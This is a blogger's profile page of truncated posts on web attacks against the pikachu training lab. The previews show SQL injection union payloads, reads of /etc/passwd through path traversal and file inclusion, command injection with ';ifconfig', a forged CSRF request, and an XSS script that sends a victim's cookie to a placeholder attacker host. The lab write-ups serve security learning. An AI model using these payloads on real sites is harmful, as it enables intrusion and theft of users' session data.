pikachu
小白头发少
这个作者很懒,什么都没留下…
展开
-
pikachu-SQL注入
pikachu-SQL注入1.数字型(post) 使用burp抓包,并进行联合注入判断字段数爆出数据库名爆出表名爆出字段名爆出用户名和密码2.字符型注入(get) 同样使用联合注入但是需要闭合单引号# 搜索框内输入1' order by 3 #1' order by 2 #-1' union select 1,group_concat(schema_name) from information_schema.schemata #-1' union select原创 2022-03-10 23:46:29 · 5395 阅读 · 0 评论 -
pikachu-FileDownload
pikachu-FileDownload1.Unsafe Filedownload 点击球星头像即可下载图片 构造地址,下载服务器的/etc/passwdhttp://192.168.1.150/pikachu-labs/vul/unsafedownload/execdownload.php?filename=kb.png# 构造后http://192.168.1.150/pikachu-labs/vul/unsafedownload/execdownload.php?filename=原创 2022-03-04 17:10:14 · 1942 阅读 · 0 评论 -
pikachu-文件包含
1.File Inclusion(local) 正常情况下访问http://192.168.1.150/pikachu-labs/vul/fileinclude/fi_local.php?filename=file1.php&submit=提交 尝试访问/etc/passwd (/etc/php.ini 需设Allow_url_include On)http://192.168.1.150/pikachu-labs/vul/fileinclude/fi_local.php?file原创 2022-03-04 16:55:39 · 1843 阅读 · 0 评论 -
pikachu-RCE
pikachu-RCE1.exec “ping”正常情况下输入Ip地址,可以看到下面有ping命令的结果 输入192.168.1.1;ifconfig,可以看到ifconfig命令的结果也显示了出来,以此类推可以伪造更多的命令。2.exec “evel” 在输入框里输入phpinfo();可以看到phpinfo()函数的结果显示了出来。...原创 2022-03-04 16:21:37 · 178 阅读 · 0 评论 -
pikachu-CSRF
pikachu-CSRF1.CSRF(GET) 修改用户信息,使用burp抓包,伪造提交的地址# 数据包GET /pikachu-labs/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=15988767673&add=dsfsf&email=kobe%40pikachu.com1&submit=submit# 伪造地址http://192.168.1.150/pikachu-labs/vul/csrf原创 2022-03-04 16:03:51 · 2283 阅读 · 0 评论 -
XSS平台获取cookie
XSS平台获取cookie1.环境介绍靶场:pikachuXSS平台:BLUE-LOTUS浏览器:火狐浏览器2.流程介绍登录XSS平台,创建获取cookie的脚本var website = "http://网站地址";(function() { (new Image()).src = website + '/?keepsession=1&location=' + escape((function() { try { return d原创 2022-02-19 13:32:27 · 3551 阅读 · 0 评论 -
pikachu靶场-XSS
pikachu靶场-XSS1.反射型xss测试输入<>'"xxxx //测试关键字是否有过滤#网页源代码<p class="xssr_title">Which NBA player do you like?</p><form method="get"> <input class="xssr_in" type="text" maxlength="20" name="message" /> <input原创 2021-11-21 21:42:21 · 896 阅读 · 0 评论